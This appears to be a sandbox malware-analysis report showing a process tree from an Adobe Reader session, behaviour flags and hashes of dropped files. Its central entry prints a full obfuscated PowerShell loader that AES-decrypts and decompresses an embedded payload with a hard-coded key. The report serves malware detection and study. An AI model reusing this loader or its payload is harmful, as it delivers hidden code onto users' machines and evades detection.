C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=EB10452E12D116E5C519764D604DF756 --mojo-platform-channel-handle=1620 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵PID:220
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=49F54D7736141D63B16B9817D8875217 --mojo-platform-channel-handle=2664 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵PID:2044
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5FB889CE9F85B8A330658E12757C850C --mojo-platform-channel-handle=2576 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:27⤵PID:768
-
-
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140436⤵PID:3820
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe $TDohU = 'AAAAAAAAAAAAAAAAAAAAAGsUUyZG1ov5a02EsZJ08iND6xtNaHYueIFf1KEbO8sk6iRxkUH3rWkOAU2b0zAIoNDqn+SH7Et754c/eWo/FTHSM0ibAvSB25VdT1n9VfcCtPHYpqmPvh3/RPsjfIQUKE56y3aJwh+C+6prv6udKMhq6/bu51o5kW4qWK0WJvFNbh7djNDcp6ObqNDm65yNdNGC56NxipDnOb72Jt/hXcEo7D1isT4TKr535ODPJvaI8HUXtJM3ClSSm0Ijy8uYD0fus5OdPcwHgyuDGT42w0YQDNxEe29suowP6LjtonRF1xKidUSTlND00BVHohDGk5ikVRbSO34/KkafXPhyrhsPE2t3LbSkUDqSmZv8GctQ4bvdAxnMZLG75kqnZBxLxsrOAMA+Bc6GuMtW4oYBqQXb1T1jRhD9Lupu2G7rxLcR306ybq7DbdROSKmNTlswEbrYF+/i1JzdgtuCtzzB9GtKHAsWvGX6N9u1CSIF2nmS9DducoqHw1EyXJ5k2R4p2awO/rtmbi3v+ic4+HHDiCinin3b6l4XtCW64wdrjdJUYiv7fb9T/3Mm2Nv8v3J5RMxTMp18zFhibOzh14ttVEZethW6zH423U3uiE1qbrIwhZ4a5JZF+B8+kOExz7Og/rZnvuDGvEUng5eRpNheajm35u+F6fUHiF+O7jERqGWAf2mXVbjy4Ii12TJTc2Ox/90Zsb+zpAyHNgW51au22US+8X19SI7Jj2GSp8v/dfDdaHq1aR6OhjJgBz8vusp1RFpFSLgKE6DaruPbL/Ze+T9RoygxoTFcFRLg+9GSO/Yns98FQkwt+o62ub8c37H/YislraFfTc4ZgCb/xou0D9sQRp44NzPCruSq74SL3BkUGDdbsO7EbUnPF9qpdnOJYz8BWbK2TjasowEJzSZDTY1Mmns6JKjTha+1Pxh7bKitckYPldLE2s3Yur8ww6tlx1cRFFoD2Z/eP4AAdwKEn6V3x79FfZSRQbanYSa0e8NkfarxWqPZR2q7Ldyc1U/i1g==';$QhjpuY = 'T1Vab3RURHF4R1RIQVJ6TWJoTmJERVNYQ2lsemFMYXE=';$XNjmYUUU = New-Object 'System.Security.Cryptography.AesManaged';$XNjmYUUU.Mode = [System.Security.Cryptography.CipherMode]::ECB;$XNjmYUUU.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$XNjmYUUU.BlockSize = 128;$XNjmYUUU.KeySize = 256;$XNjmYUUU.Key = [System.Convert]::FromBase64String($QhjpuY);$ZbOvE = [System.Convert]::FromBase64String($TDohU);$CGfOYIRO = $ZbOvE[0..15];$XNjmYUUU.IV = $CGfOYIRO;$LwrOMzefd = $XNjmYUUU.CreateDecryptor();$ldlRDguUf = $LwrOMzefd.TransformFinalBlock($ZbOvE, 16, $ZbOvE.Length - 16);$XNjmYUUU.Dispose();$ynpPY = New-Object System.IO.MemoryStream( , $ldlRDguUf );$CCVny = New-Object System.IO.MemoryStream;$WXaAoEGtt = New-Object System.IO.Compression.GzipStream $ynpPY, ([IO.Compression.CompressionMode]::Decompress);$WXaAoEGtt.CopyTo( $CCVny );$WXaAoEGtt.Close();$ynpPY.Close();[byte[]] $gLXiEJ = $CCVny.ToArray();$mrjDyZl = [System.Text.Encoding]::UTF8.GetString($gLXiEJ);$mrjDyZl4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2100
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
56KB
MD5752a1f26b18748311b691c7d8fc20633
SHA1c1f8e83eebc1cc1e9b88c773338eb09ff82ab862
SHA256111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131
SHA512a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5
-
Filesize
64KB
MD579f49c72f798e56c0ae546c2d3d41bfc
SHA13ee6ec99584233306a5cf89658eca3d1ca0f6cfb
SHA2566098fc2c3d1e710a8be1a89a106c5863e046b9994c275b58039e5ca4b92ef182
SHA512efe8db13515ab345977ad273378f0c1f93fa58099c5a1cf13d57d9fe6ee2eb5c680ffca7a7710f42562f0fe909565eb315be8328ff99e3459d279fd8b1c179b0
-
Filesize
36KB
MD5b30d3becc8731792523d599d949e63f5
SHA119350257e42d7aee17fb3bf139a9d3adb330fad4
SHA256b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3
SHA512523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e
-
Filesize
1KB
MD5def65711d78669d7f8e69313be4acf2e
SHA16522ebf1de09eeb981e270bd95114bc69a49cda6
SHA256aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c
SHA51205b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7
-
Filesize
15KB
MD51429f3b28e1bf4f7922401483f74e19c
SHA14627e327b86ae3a7f0c265f80c6c4db15c503d2d
SHA2569f6ceaf449a9f645f8b70ba1307cdd3b6173e78b86eebc90a22e88e39798e163
SHA512049b0472b2b428e7572cea34b82e6a3c94a57399dc526ea6fc43fbadf42ac6e9473f4e1d19a9e40c2f78c3839986590d71b9bd56801c48fa8e1bcad4400f9230
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
76KB
MD5dab3a8545b5af926052d9d8f0ec9cdf7
SHA193933707a5419d924bec45d6a8d40aa052fe47e7
SHA256786629ef28584d11f095ea98d6f159d354dd88bf49e6d8ac053c47a34b29e9b6
SHA51282f9c567cc00888ec8634cae99126a4a188e3d090e38a625f29c33d02ca208c5915811079af043a857d0b8fc646b82938d742ea85f53ab89333c743b582c2d89